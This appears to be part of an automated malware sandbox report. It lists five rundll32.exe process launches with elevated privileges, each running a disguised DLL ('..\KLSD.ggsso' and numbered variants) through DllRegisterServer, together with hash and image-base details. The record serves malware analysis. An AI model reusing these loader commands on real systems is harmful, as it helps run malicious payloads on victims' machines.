                  Start time:16:17:17
                  Start date:23/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\KLSD.ggsso,DllRegisterServer
                  Imagebase:0xffb50000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:17:17
                  Start date:23/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\KLSD.ggsso1,DllRegisterServer
                  Imagebase:0xffb50000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:17:18
                  Start date:23/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\KLSD.ggsso2,DllRegisterServer
                  Imagebase:0xffb50000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:17:18
                  Start date:23/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\KLSD.ggsso3,DllRegisterServer
                  Imagebase:0xffb50000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:17:18
                  Start date:23/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\KLSD.ggsso4,DllRegisterServer
                  Imagebase:0xffb50000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis
